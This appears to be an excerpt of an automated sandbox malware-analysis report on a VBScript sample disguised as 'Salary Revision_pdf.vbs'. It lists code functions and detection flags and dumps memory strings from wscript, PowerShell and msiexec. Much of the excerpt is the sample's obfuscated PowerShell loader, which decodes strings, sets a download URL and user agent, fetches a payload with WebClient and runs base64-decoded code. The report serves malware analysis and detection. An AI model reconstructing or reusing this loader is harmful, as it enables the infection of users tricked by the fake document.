Source: C:\Windows\SysWOW64\msiexec.exe Code function: 12_2_00449300 12_2_00449300
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 12_2_0040D322 12_2_0040D322
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 12_2_0044A4F0 12_2_0044A4F0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 12_2_0043A5AB 12_2_0043A5AB
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 12_2_00413631 12_2_00413631
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 12_2_00446690 12_2_00446690
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 12_2_0044A730 12_2_0044A730
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 12_2_004398D8 12_2_004398D8
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 12_2_004498E0 12_2_004498E0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 12_2_0044A886 12_2_0044A886
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 12_2_0043DA09 12_2_0043DA09
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 12_2_00438D5E 12_2_00438D5E
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 12_2_00449ED0 12_2_00449ED0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 12_2_0041FE83 12_2_0041FE83
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 12_2_00430F54 12_2_00430F54
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_004050C2 13_2_004050C2
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_004014AB 13_2_004014AB
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_00405133 13_2_00405133
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_004051A4 13_2_004051A4
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_00401246 13_2_00401246
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_0040CA46 13_2_0040CA46
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_00405235 13_2_00405235
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_004032C8 13_2_004032C8
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_00401689 13_2_00401689
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_00402F60 13_2_00402F60
Found potential string decryption / allocating functions
Source: C:\Windows\SysWOW64\msiexec.exe Code function: String function: 004169A7 appears 87 times
Source: C:\Windows\SysWOW64\msiexec.exe Code function: String function: 0044DB70 appears 41 times
Source: C:\Windows\SysWOW64\msiexec.exe Code function: String function: 004165FF appears 35 times
Source: C:\Windows\SysWOW64\msiexec.exe Code function: String function: 00422297 appears 42 times
Source: C:\Windows\SysWOW64\msiexec.exe Code function: String function: 00444B5A appears 37 times
Source: C:\Windows\SysWOW64\msiexec.exe Code function: String function: 00413025 appears 79 times
Source: C:\Windows\SysWOW64\msiexec.exe Code function: String function: 00416760 appears 69 times
Java / VBScript file with very long strings (likely obfuscated code)
Source: Salary Revision_pdf.vbs Initial sample: Strings found which are bigger than 50
Very long command line found
Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 5336
Source: unknown Process created: Commandline size = 5336
Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 5336 Jump to behavior
Source: wscript.exe, 00000000.00000003.1350102325.0000023D996B8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: delsesprocesser;$alma+=$Megafonens[$Genanvendelsesprocesser];$Erantissenes='Nemhed';}$alma;}function Vandende($Feriers){ .($Bibliografisk) ($Feriers);}$Mealymouthedness=Adiabaticlly 'In MslioRebzVani ndlPyrlfulaEni/sco ';$Mealymouthedness+=Adiabaticlly 'Fli5Udk.Con0nel stu(DevWB gi den RodskroAmpw Tos Po Re NTilTuge I l1 Li0.ha. La0 ,i;Ann DryWTi iB.onUnd6Ham4Aff;Oxy satxUnd6 Gi4Ung;Dam MisrDiavsva:The1Tia3,ou1Inf.til0T t)Ma. BhiGsidesamcRefk FioFa,/ Vi2 Ge0For1s,o0Fll0 pe1oft0 b1 i steF oiCherstieshafTv.oFlyx .t/Cen1 B 3 Co1s m.T.l0Uds ';$Verdeners=Adiabaticlly 'se u ass B ETi,r an-JunAForG EveTrsNDepT To ';$Belard=Adiabaticlly ' UdhNint A.tLi pIdis o:st /Alg/UndsovefWor4 O l sp.JacsserhBaaoIngpBr./ Muz brWDy AB lb P,mF drUd,m TuPInd/ KoDi fiCyswKria ,rnB siGe,.sacpBeif DabUdt ';$Preindisposition=Adiabaticlly 'P,e>neu ';$Bibliografisk=Adiabaticlly 'C iI .neAurxVel ';$Formaalene='Celiectomy';$Ujordiskes='\Taxlessly199.Cho';Vandende (Adiabaticlly 'Alp$bragHiel llo H bsidAMyclopl:PerRE eeselfjanrlucAUn CArstParOFo MWh eGenT,asrBulYHs 1Pos8 Un8,ne= No$ enEUnvNcriVOm : ffAEkiP Php odMetAs iTDisA la+sy $ U UCatjJouOG,irFordOveiNedsWrykKeeeFedssmi ');Vandende (Adiabaticlly ' H $ rGs,il svO onBTilA .aLA.d:.haFOrdO,lerRbes Ork dn Kvi,ngNansGOpksA tROxfEskos DaudorLa.kt nta titBoue FyrudksDel=Try$ .nbF rERholeddADirr,andHol.sursPo pGulL ori Ent pe(T n$ Exp eR.rne .tI UnNsepD liI LesTr.p fsosynsTo iLiktHosiKl,oTrinsv )Dul ');Vandende (Adiabaticlly 'Gen[KluNLileswaTI s. nsF oeimpRshaV oITrfCHaneC,up EpOAt IsigNKurT seMYasA roN T asilGValesilRgra]Fus:Fam:Ab srepEKa,cstaukn RInoIzootLudYPatpstoRps.O FrTDeaOZencsoloGr LDre Evi=s b Utu[.urnFodeDantsan.Lumss ae seCUriuspar R IUnjT dyKdep,dorPaaoLiltUnco,ubc saOFaclR,gt nyAnkpskuEAfs]Erk:Abo:D atsk lGurssty1Ran2sle ');$Belard=$Forskningsresultaters[0];$Estimeringens=(Adiabaticlly '.nd$ BagD sLsanoskrbAntaextlTol:sknMIndaEl UB rNAleD xpEHo,RVej=CornRemEVecwBu - AkoIntB InjTaneskic eatRep Hiss OpyLn sUnrTrefeattmodo.UndnBese Aft Er. enwForEUngB omcs,uLUnciVu EDolnModTGen ');Vandende ($Estimeringens);Vandende (Adiabaticlly 'Zak$UsaManraFodu FonIm,dIl eForrInd.vaaHF.oe llaTild unesymrbeestyr[ .t$ haV meO trTrad nesa n ape LerOffsRec]K r=Har$InsM sse raBanlregy l mInjo spu latMish AreGa dF unDele Gjs Bas ,h ');$Oxyhematin=Adiabaticlly 'Ava$UnoMBluaevnu pn FudFeleForrT n. unDstyoBrnw,izn sklU,wovkka HydChoF.rviba.lskaeRig(she$VejBUnqeHjelLaba NorResd r , i$.reB Hye PrtMataOv lslaiZebn sig,aveFrsrMensDra)V r ';$Betalingers=$Refractometry188;Vandende (Adiabaticlly ' Un$Kalgs bL HaOOldBalla.arLLeu:semEU,flslsE ntp Hoh.oiA I N KutH eI Fea tasFynIKurs,re=Lob( Rut Ure,ansLnlTses- Unp pfaCorTUn h,bs .nv$T,lBKatE G t MoaInfl s,iC nNop gantEs,cr Fis e)H s ');while (!$Elephantiasis) {Vandende (Adiabaticlly '.en$ AbgWaml anoTumb roa NilAgr:ValUPlonLnigPlarsejoHypp A.e idaOesbMa,lCapeKon=Bag$ApatstrrAriuP re A ') ;Vandende $Oxyhematin;Vandende (Adiabaticlly 'Mo.sBroTDrlARair I,T.li- hys,lsl wae M.eF rpsty P 4so
Source: powershell.exe, 00000002.00000002.1531059954.000001C4FCFD3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: $DisG.amlsatOstubAnaAObelFra:Ry c TraQuaMskapCudBC oe pelneol.ueis osDrfm .n1 .i5.cc4Akv+Ven+svk%D l$gteFFe O stRProsGrdK KlNEtyiMewNKomgsubsGuir GtEKvisU luVvnl eaT T AAcct imE Asrsacssor.WieC ioR eUAfrN DetAkk ') ;$Belard=$Forskningsresultaters[$Kursusformaals];}$statuslinjen=309718;$Noncurrently=29527;Vandende (Adiabaticlly ' Dr$ ong ll Lio BeB ybAA.slNar:LimB TiyYetDFireEftLKets FrFtriO,isRAposovegMerEs ttse. sal=sto sang s.eBurts.o-supcsypoBrin .itPenE H N.ntTH n Tis$skrb neeGalTparAKvaLskai Non U Gbene AfrLogsCal ');Vandende (Adiabaticlly ' Vg$ R g P lPikoFgtbDi,a ulFor:Lnsksatr prirumlAut Her=pro ind[Ov.sPriysamsIndt ede Mam ir.AbsCAg oI,an wvfores arphotNo ].or:Op,:.utFBrdr L oHelmdisBov aChesIngeFor6 P 4 Ces oztA br,epiflunJergsal(Ind$IsoB s y.isd nieslulCinsGeofInnoskurGeosDaggVa.eAartJ r)Bis ');Vandende (Adiabaticlly ' re$TitgHenl Peo,loBvejAAfsLFri:KonRTekaAnltF aI PaOMarn lrANonlO.eiRe.s idE InR,reeR c Fo=Fus M t[BygsFloYPersRestTziEEf.Msub.Beht.nieThoXPirTLys. Te2q)
Source: powershell.exe, 00000002.00000002.1532176181.000001C4FD0A5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: sacssor.WieC ioR eUAfrN DetAkk ') ;$Belard=$Forskningsresultaters[$Kursusformaals];}$statuslinjen=309718;$Noncurrently=29527;Vandende (Adiabaticlly ' Dr$ ong ll Lio BeB ybAA.slNar:LimB TiyYetDFireEftLKets FrFtriO,isRAposovegMerEs ttse. sal=sto sang s.eBurts.o-supcsypoBrin .itPenE H N.ntTH n Tis$skrb neeGalTparAKvaLskai Non U Gbene AfrLogsCal ');Vandende (Adiabaticlly ' Vg$ R g P lPikoFgtbDi,a ulFor:Lnsksatr prirumlAut Her=pro ind[Ov.sPriysamsIndt ede Mam ir.AbsCAg oI,an wvfores arphotNo ].or:Op,:.utFBrdr L oHelmdisBov aChesIngeFor6 P 4 Ces oztA br,epiflunJergsal(Ind$IsoB s y.isd nieslulCinsGeofInnoskurGeosDaggVa.eAartJ r)Bis ');Vandende (Adiabaticlly ' re$TitgHenl Peo,loBvejAAfsLFri:KonRTekaAnltF aI PaOMarn lrANonlO.eiRe.s idE InR,reeR c Fo=Fus M t[BygsFloYPersRestTziEEf.Msub.Beht.nieThoXPirTLys. TeeA oN iCskrOstiDUnvI piNsteGE e]Mec:Fem:VaaAUdssBefcDroiBr iTra. eG Whef.rTsersMeitFakRNo IIseN .aG Ta(End$ChikQ.arBeriUnclJ,r)idi ');Vandende (Adiabaticlly 'Kal$AutGswil skOBerbU tAAmblB,g:sejsBioKFilrResh eO tiV lieHa d ,sEF sT k=Jge$strr ecaLi TB lI Teo ArnHaiAsimL s Isals Paesubr MaECi . WrsAbnu Deb sks stt OrrDati Nin ag Ad(Ko $skdsstatskra ,eT t uH ssskrlb aIMusNLeuJP rEBurnbas,.an$ nrnYanoin n InCCasustrr,onR fdEArtnstot DeL UdYRec) h ');Vandende $skrhovedet;"t
Source: wscript.exe, 00000000.00000002.1357482533.0000023D99859000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: e (Adiabaticlly 'Mo.sBroTDrlARair I,T.li- hys,lsl wae M.eF rpsty P 4sof ');Vandende (Adiabaticlly 'M n$ Udg,rolBedO hB ana Unlpas: heditL oyEL.bpFreH isABi NspeTstaiGreaD,ssMoti Agsbe =T.n(LimTTacEInds HetFal-Vi p grasabt LghDef Ern$si.Bl nERa.tFdeasubLu.sIinsN ImG NoeHelRsy sTra)F a ') ;Vandende (Adiabaticlly 'alf$Teng ,alstiO,orB heaTopLPu :guiKPeru ntR ,os nduRefs DiF InO F,rP.lM CaAskaaAlhLKiss Mi=sis$DisG.amlsatOstubAnaAObelFra:Ry c TraQuaMskapCudBC oe pelneol.ueis osDrfm .n1 .i5.cc4Akv+Ven+svk%D l$gteFFe O stRProsGrdK KlNEtyiMewNKomgsubsGuir GtEKvisU luVvnl eaT T AAcct imE Asrsacssor.WieC ioR eUAfrN DetAkk ') ;$Belard=$Forskningsresultaters[$Kursusformaals];}$statuslinjen=309718;$Noncurrently=29527;Vandende (Adiabaticlly ' Dr$ ong ll Lio BeB ybAA.slNar:LimB TiyYetDFireEftLKets FrFtriO,isRAposovegMerEs ttse. sal=sto sang s.eBurts.o-supcsypoBrin .itPenE H N.ntTH n Tis$skrb neeGalTparAKvaLskai Non U Gbene AfrLogsCal ');Vandende (Adiabaticlly ' Vg$ R g P lPikoFgtbDi,a ulFor:Lnsksatr prirumlAut Her=pro ind[Ov.sPriysamsIndt ede Mam ir.AbsCAg oI,an wvfores arphotNo ].or:Op,:.utFBrdr L oHelmdisBov aChesIngeFor6 P 4 Ces oztA br,epiflunJergsal(Ind$IsoB s y.isd nieslulCinsGeofInnoskurGeosDaggVa.eAartJ r)Bis ');Vandende (Adiabaticlly ' re$TitgHenl Peo,loBvejAAfsLFri:KonRTekaAnltF aI PaOMarn lrANonlO.eiRe.s idE InR,reeR c Fo=Fus M t[BygsFloYPersRestTziEEf.Msub.Beht.nieThoXPirTLys. TeeA oN iCskrOstiDUnvI piNsteGE e]Mec:Fem:VaaAUdssBefcDroiBr iTra. eG Whef.rTsersMeitFakRNo IIseN .aG Ta(End$ChikQ.arBeriUnclJ,r)idi ');Vandende (Adiabaticlly 'Kal$AutGswil skOBerbU tAAmblB,g:sejsBioKFilrResh eO tiV lieHa d ,sEF sT k=Jge$strr ecaLi TB lI Teo ArnHaiAsimL s Isals Paesubr MaECi . WrsAbnu Deb sks stt OrrDati Nin ag Ad(Ko $skdsstatskra ,eT t uH ssskrlb aIMusNLeuJP rEBurnbas,.an$ nrnYanoin n InCCasustrr,onR fdEArtnstot DeL UdYRec) h ');Vandende $skrhovedet;"
Source: powershell.exe, 00000004.00000002.1636903665.0000000002FD4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: gsbe =T.n(LimTTacEInds HetFal-Vi p grasabt LghDef Ern$si.Bl nERa.tFdeasubLu.sIinsN ImG NoeHelRsy sTra)F a ') ;Vandende (Adiabaticlly 'alf$Teng ,alstiO,orB heaTopLPu :guiKPeru ntR ,os nduRefs DiF InO F,rP.lM CaAskaaAlhLKiss Mi=sis$DisG.amlsatOstubAnaAObelFra:Ry c TraQuaMskapCudBC oe pelneol.ueis osDrfm .n1 .i5.cc4Akv+Ven+svk%D l$gteFFe O stRProsGrdK KlNEtyiMewNKomgsubsGuir GtEKvisU luVvnl eaT T AAcct imE Asrsacssor.WieC ioR eUAfrN DetAkk ') ;$Belard=$Forskningsresultaters[$Kursusformaals];}$statuslinjen=309718;$Noncurrently=29527;Vandende (Adiabaticlly ' Dr$ ong ll Lio BeB ybAA.slNar:LimB TiyYetDFireEftLKets FrFtriO,isRAposovegMerEs ttse. sal=sto sang s.eBurts.o-supcsypoBrin .itPenE H N.ntTH n Tis$skrb neeGalTparAKvaLskai Non U Gbene AfrLogsCal ');Vandende (Adiabaticlly ' Vg$ R g P lPikoFgtbDi,a ulFor:Lnsksatr prirumlAut Her=pro ind[Ov.sPriysamsIndt ede Mam ir.AbsCAg oI,an wvfores arphotNo ].or:Op,:.utFBrdr L oHelmdisBov aChesIngeFor6 P 4 Ces oztA br,epiflunJergsal(Ind$IsoB s y.isd nieslulCinsGeofInnoskurGeosDaggVa.eAartJ r)Bis ');Vandende (Adiabaticlly ' re$TitgHenl Peo,loBvejAAfsLFri:KonRTekaAnltF aI PaOMarn lrANonlO.eiRe.s idE InR,reeR c Fo=Fus M t[BygsFloYPersRestTziEEf.Msub.Beht.nieThoXPirTLys. TeeA oN iCskrOstiDUnvI piNsteGE e]Mec:Fem:VaaAUdssBefcDroiBr iTra. eG Whef.rTsersMeitFakRNo IIseN .aG Ta(End$ChikQ.arBeriUnclJ,r)idi ');Vandende (Adiabaticlly 'Kal$AutGswil skOBerbU tAAmblB,g:sejsBioKFilrResh eO tiV lieHa d ,sEF sT k=Jge$strr ecaLi TB lI Teo ArnHaiAsimL s Isals Paesubr MaECi . WrsAbnu Deb sks stt OrrDati Nin ag Ad(Ko $skdsstatskra ,eT t uH ssskrlb aIMusNLeuJP rEBurnbas,.an$ nrnYanoin n InCCasustrr,onR fdEArtnstot DeL UdYRec) h ');Vandende $skrhovedet;"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWinsta0\Default
Source: powershell.exe, 00000002.00000002.1530040187.000001C4FCDB0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: tly=29527;vandende (adiabaticlly ' dr$ ong ll lio beb ybaa.slnar:limb tiyyetdfireeftlkets frftrio,israposovegmeres ttse. sal=sto sang s.eburts.o-supcsypobrin .itpene h n.ntth n tis$skrb neegaltparakvalskai non u gbene afrlogscal ');vandende (adiabaticlly ' vg$ r !
Source: wscript.exe, 00000000.00000003.1354223614.0000023D997D5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1354005111.0000023D997C8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: endelsesprocesser=3;$Genanvendelsesprocesser -lt $Minim;$Genanvendelsesprocesser+=4){$Farings=$Genanvendelsesprocesser;$alma+=$Megafonens[$Genanvendelsesprocesser];$Erantissenes='Nemhed';}$alma;}function Vandende($Feriers){ .($Bibliografisk) ($Feriers);}$Mealymouthedness=Adiabaticlly 'In MslioRebzVani ndlPyrlfulaEni/sco ';$Mealymouthedness+=Adiabaticlly 'Fli5Udk.Con0nel stu(DevWB gi den RodskroAmpw Tos Po Re NTilTuge I l1 Li0.ha. La0 ,i;Ann DryWTi iB.onUnd6Ham4Aff;Oxy satxUnd6 Gi4Ung;Dam MisrDiavsva:The1Tia3,ou1Inf.til0T t)Ma. BhiGsidesamcRefk FioFa,/ Vi2 Ge0For1s,o0Fll0 pe1oft0 b1 i steF oiCherstieshafTv.oFlyx .t/Cen1 B 3 Co1s m.T.l0Uds ';$Verdeners=Adiabaticlly 'se u ass B ETi,r an-JunAForG EveTrsNDepT To ';$Belard=Adiabaticlly ' UdhNint A.tLi pIdis o:st /Alg/UndsovefWor4 O l sp.JacsserhBaaoIngpBr./ Muz brWDy AB lb P,mF drUd,m TuPInd/ KoDi fiCyswKria ,rnB siGe,.sacpBeif DabUdt ';$Preindisposition=Adiabaticlly 'P,e>neu ';$Bibliografisk=Adiabaticlly 'C iI .neAurxVel ';$Formaalene='Celiectomy';$Ujordiskes='\Taxlessly199.Cho';Vandende (Adiabaticlly 'Alp$bragHiel llo H bsidAMyclopl:PerRE eeselfjanrlucAUn CArstParOFo MWh eGenT,asrBulYHs 1Pos8 Un8,ne= No$ enEUnvNcriVOm : ffAEkiP Php odMetAs iTDisA la+sy $ U UCatjJouOG,irFordOveiNedsWrykKeeeFedssmi ');Vandende (Adiabaticlly ' H $ rGs,il svO onBTilA .aLA.d:.haFOrdO,lerRbes Ork dn Kvi,ngNansGOpksA tROxfEskos DaudorLa.kt nta titBoue FyrudksDel=Try$ .nbF rERholeddADirr,andHol.sursPo pGulL ori Ent pe(T n$ Exp eR.rne .tI UnNsepD liI LesTr.p fsosynsTo iLiktHosiKl,oTrinsv )Dul ');Vandende (Adiabaticlly 'Gen[KluNLileswaTI s. nsF oeimpRshaV oITrfCHaneC,up EpOAt IsigNKurT seMYasA roN T asilGValesilRgra]Fus:Fam:Ab srepEKa,cstaukn RInoIzootLudYPatpstoRps.O FrTDeaOZencsoloGr LDre Evi=s b Utu[.urnFodeDantsan.Lumss ae seCUriuspar R IUnjT dyKdep,dorPaaoLiltUnco,ubc saOFaclR,gt nyAnkpskuEAfs]Erk:Abo:D atsk lGurssty1Ran2sle ');$Belard=$Forskningsresultaters[0];$Estimeringens=(Adiabaticlly '.nd$ BagD sLsanoskrbAntaextlTol:sknMIndaEl UB rNAleD xpEHo,RVej=CornRemEVecwBu - AkoIntB InjTaneskic eatRep Hiss OpyLn sUnrTrefeattmodo.UndnBese Aft Er. enwForEUngB omcs,uLUnciVu EDolnModTGen ');Vandende ($Estimeringens);Vandende (Adiabaticlly 'Zak$UsaManraFodu FonIm,dIl eForrInd.vaaHF.oe llaTild unesymrbeestyr[ .t$ haV meO trTrad nesa n ape LerOffsRec]K r=Har$InsM sse raBanlregy l mInjo spu latMish AreGa dF unDele Gjs Bas ,h ');$Oxyhematin=Adiabaticlly 'Ava$UnoMBluaevnu pn FudFeleForrT n. unDstyoBrnw,izn sklU,wovkka HydChoF.rviba.lskaeRig(she$VejBUnqeHjelLaba NorResd r , i$.reB Hye PrtMataOv lslaiZebn sig,aveFrsrMensDra)V r ';$Betalingers=$Refractometry188;Vandende (Adiabaticlly ' Un$Kalgs bL HaOOldBalla.arLLeu:semEU,flslsE ntp Hoh.oiA I N KutH eI Fea tasFynIKurs,re=Lob( Rut Ure,ansLnlTses- Unp pfaCorTUn h,bs .nv$T,lBKatE G t MoaInfl s,iC nNop gantEs,cr Fis e)H s ');while (!$Elephantiasis) {Vandende (Adiabaticlly '.en$ AbgWaml anoTumb roa NilAgr:ValUPlonLnigPlarsejoHypp A.e idaOesbMa,lCapeKon=Bag$ApatstrrAriuP re A
Source: msiexec.exe, 00000007.00000002.2632696705.0000000004356000.00000040.00000400.00020000.00000000.sdmp Binary or memory string: pOAt IsigNKurT seMYasA roN T asilGValesilRgra]Fus:Fam:Ab srepEKa,cstaukn RInoIzootLudYPatpstoRps.O FrTDeaOZencsoloGr LDre Evi=s b Utu[.urnFodeDantsan.Lumss ae seCUriuspar R IUnjT dyKdep,dorPaaoLiltUnco,ubc saOFaclR,gt nyAnkpskuEAfs]Erk:Abo:D atsk lGurssty1Ran2sle ');$Belard=$Forskningsresultaters[0];$Estimeringens=(Adiabaticlly '.nd$ BagD sLsanoskrbAntaextlTol:sknMIndaEl UB rNAleD xpEHo,RVej=CornRemEVecwBu - AkoIntB InjTaneskic eatRep Hiss OpyLn sUnrTrefeattmodo.UndnBese Aft Er. enwForEUngB omcs,uLUnciVu EDolnModTGen ');Vandende ($Estimeringens);Vandende (Adiabaticlly 'Zak$UsaManraFodu FonIm,dIl eForrInd.vaaHF.oe llaTild unesymrbeestyr[ .t$ haV meO trTrad nesa n ape LerOffsRec]K r=Har$InsM sse raBanlregy l mInjo spu latMish AreGa dF unDele Gjs Bas ,h ');$Oxyhematin=Adiabaticlly 'Ava$UnoMBluaevnu pn FudFeleForrT n. unDstyoBrnw,izn sklU,wovkka HydChoF.rviba.lskaeRig(she$VejBUnqeHjelLaba NorResd r , i$.reB Hye PrtMataOv lslaiZebn sig,aveFrsrMensDra)V r ';$Betalingers=$Refractometry188;Vandende (Adiabaticlly ' Un$Kalgs bL HaOOldBalla.arLLeu:semEU,flslsE ntp Hoh.oiA I N KutH eI Fea tasFynIKurs,re=Lob( Rut Ure,ansLnlTses- Unp pfaCorTUn h,bs .nv$T,lBKatE G t MoaInfl s,iC nNop gantEs,cr Fis e)H s ');while (!$Elephantiasis) {Vandende (Adiabaticlly '.en$ AbgWaml anoTumb roa NilAgr:ValUPlonLnigPlarsejoHypp A.e idaOesbMa,lCapeKon=Bag$ApatstrrAriuP re A ') ;Vandende $Oxyhematin;Vandende (Adiabaticlly 'Mo.sBroTDrlARair I,T.li- hys,lsl wae M.eF rpsty P 4sof ');Vandende (Adiabaticlly 'M n$ Udg,rolBedO hB ana Unlpas: heditL oyEL.bpFreH isABi NspeTstaiGreaD,ssMoti Agsbe =T.n(LimTTacEInds HetFal-Vi p grasabt LghDef Ern$si.Bl nERa.tFdeasubLu.sIinsN ImG NoeHelRsy sTra)F a ') ;Vandende (Adiabaticlly 'alf$Teng ,alstiO,orB heaTopLPu :guiKPeru ntR ,os nduRefs DiF InO F,rP.lM CaAskaaAlhLKiss Mi=sis$DisG.amlsatOstubAnaAObelFra:Ry c TraQuaMskapCudBC oe pelneol.ueis osDrfm .n1 .i5.cc4Akv+Ven+svk%D l$gteFFe O stRProsGrdK KlNEtyiMewNKomgsubsGuir GtEKvisU luVvnl eaT T AAcct imE Asrsacssor.WieC ioR eUAfrN DetAkk ') ;$Belard=$Forskningsresultaters[$Kursusformaals];}$statuslinjen=309718;$Noncurrently=29527;Vandende (Adiabaticlly ' Dr$ ong ll Lio BeB ybAA.slNar:LimB TiyYetDFireEftLKets FrFtriO,isRAposovegMerEs ttse. sal=sto sang s.eBurts.o-supcsypoBrin .itPenE H N.ntTH n Tis$skrb neeGalTparAKvaLskai Non U Gbene AfrLogsCal ');Vandende (Adiabaticlly ' Vg$ R g P lPikoFgtbDi,a ulFor:Lnsksatr prirumlAut Her=pro ind[Ov.sPriysamsIndt ede Mam ir.AbsCAg oI,an wvfores arphotNo ].or:Op,:.utFBrdr L oHelmdisBov aChesIngeFor6 P 4 Ces oztA br,epiflunJergsal(Ind$IsoB s y.isd nieslulCinsGeofInnoskurGeosDaggVa.eAartJ r)Bis ');Vandende (Adiabaticlly ' re$TitgHenl Peo,loBvejAAfsLFri:KonRTekaAnltF aI PaOMarn lrANonlO.eiRe.s idE InR,reeR c Fo=Fus M t[BygsFloYPersRestTziEEf.Msub.Beht.nieThoXPirTLys. TeeA oN iCskrOstiDUnvI piNsteGE e]Mec:Fem:VaaAUdssBefcDroiBr iTra. eG Whef.rTsersMeitFakRNo IIseN .aG Ta(End$ChikQ.arBeriUnclJ,r)idi ');Vandende (Adiabaticlly 'Kal$AutGswil skOBerbU tAAmblB
Source: powershell.exe, 00000002.00000002.1487804584.000001C4E4C76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1643774496.0000000004FC7000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Dr$ ong ll Lio BeB ybAA.slNar:LimB TiyYetDFireEftLKets FrFtriO,isRAposovegMerEs ttse. sal=sto sang s.eBurts.o-supcsypoBrin .itPenE H N.ntTH n Tis$skrb neeGalTparAKvaLskai Non U Gbene AfrLogsCal
Source: powershell.exe, 00000004.00000002.1670991960.00000000078AA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: B ybAA.slNar:LimB 49-
Source: wscript.exe, 00000000.00000003.1353897138.0000023D9986B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: n ape LerOffsRec]K r=Har$InsM sse raBanlregy l mInjo spu latMish AreGa dF unDele Gjs Bas ,h ');$Oxyhematin=Adiabaticlly 'Ava$UnoMBluaevnu pn FudFeleForrT n. unDstyoBrnw,izn sklU,wovkka HydChoF.rviba.lskaeRig(she$VejBUnqeHjelLaba NorResd r , i$.reB Hye PrtMataOv lslaiZebn sig,aveFrsrMensDra)V r ';$Betalingers=$Refractometry188;Vandende (Adiabaticlly ' Un$Kalgs bL HaOOldBalla.arLLeu:semEU,flslsE ntp Hoh.oiA I N KutH eI Fea tasFynIKurs,re=Lob( Rut Ure,ansLnlTses- Unp pfaCorTUn h,bs .nv$T,lBKatE G t MoaInfl s,iC nNop gantEs,cr Fis e)H s ');while (!$Elephantiasis) {Vandende (Adiabaticlly '.en$ AbgWaml anoTumb roa NilAgr:ValUPlonLnigPlarsejoHypp A.e idaOesbMa,lCapeKon=Bag$ApatstrrAriuP re A ') ;Vandende $Oxyhematin;Vandende (Adiabaticlly 'Mo.sBroTDrlARair I,T.li- hys,lsl wae M.eF rpsty P 4sof ');Vandende (Adiabaticlly 'M n$ Udg,rolBedO hB ana Unlpas: heditL oyEL.bpFreH isABi NspeTstaiGreaD,ssMoti Agsbe =T.n(LimTTacEInds HetFal-Vi p grasabt LghDef Ern$si.Bl nERa.tFdeasubLu.sIinsN ImG NoeHelRsy sTra)F a ') ;Vandende (Adiabaticlly 'alf$Teng ,alstiO,orB heaTopLPu :guiKPeru ntR ,os nduRefs DiF InO F,rP.lM CaAskaaAlhLKiss Mi=sis$DisG.amlsatOstubAnaAObelFra:Ry c TraQuaMskapCudBC oe pelneol.ueis osDrfm .n1 .i5.cc4Akv+Ven+svk%D l$gteFFe O stRProsGrdK KlNEtyiMewNKomgsubsGuir GtEKvisU luVvnl eaT T AAcct imE Asrsacssor.WieC ioR eUAfrN DetAkk ') ;$Belard=$Forskningsresultaters[$Kursusformaals];}$statuslinjen=309718;$Noncurrently=29527;Vandende (Adiabaticlly ' Dr$ ong ll Lio BeB ybAA.slNar:LimB TiyYetDFireEftLKets FrFtriO,isRAposovegMerEs ttse. sa&#
Source: powershell.exe Binary or memory string: ' Dr$ ong ll Lio BeB ybAA.slNar:LimB TiyYetDFireEftLKets FrFtriO,isRAposovegMerEs ttse. sal=sto sang s.eBurts.o-supcsypoBrin .it
Source: powershell.exe, 00000002.00000002.1532176181.000001C4FD09C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Asrsacssor.WieC ioR eUAfrN DetAkk ') ;$Belard=$Forskningsresultaters[$Kursusformaals];}$statuslinjen=309718;$Noncurrently=29527;Vandende (Adiabaticlly ' Dr$ ong ll Lio BeB ybAA.slNar:LimB TiyYetDFireEftLKets FrFtriO,isRAposovegMerEs ttse. sal=sto sang s.eBurts.o-supcsypoBrin .itPenE H N.ntTH n Tis$skrb neeGalTparAKvaLskai Non U Gbene AfrLogsCal ');Vandende (Adiabaticlly ' Vg$ R g P lPikoFgtbDi,a ulFor:Lnsksatr prirumlAut Her=pro ind[Ov.sPriysamsIndt ede Mam ir.AbsCAg oI,an wvfores arphotNo ].or:Op,:.utFBrdr L oHelmdisBov aChesIngeFor6 P 4 Ces oztA br,epiflunJergsal(Ind$IsoB s y.isd nieslulCinsGeofInnoskurGeosDaggVa.eAartJ r)Bis ');Vandende (Adiabaticlly ' re$TitgHenl Peo,loBvejAAfsLFri:KonRTekaAnltF aI PaOMarn lrANonlO.eiRe.s idE InR,reeR c Fo=Fus M t[BygsFloYPersRestTziEEf.Msub.Beht.nieThoXPirTLys. TeeA oN iCskrOstiDUnvI piNsteGE e]Mec:Fem:VaaAUdssBefcDroiBr iTra. eG Whef.rTsersMeitFakRNo IIseN .aG 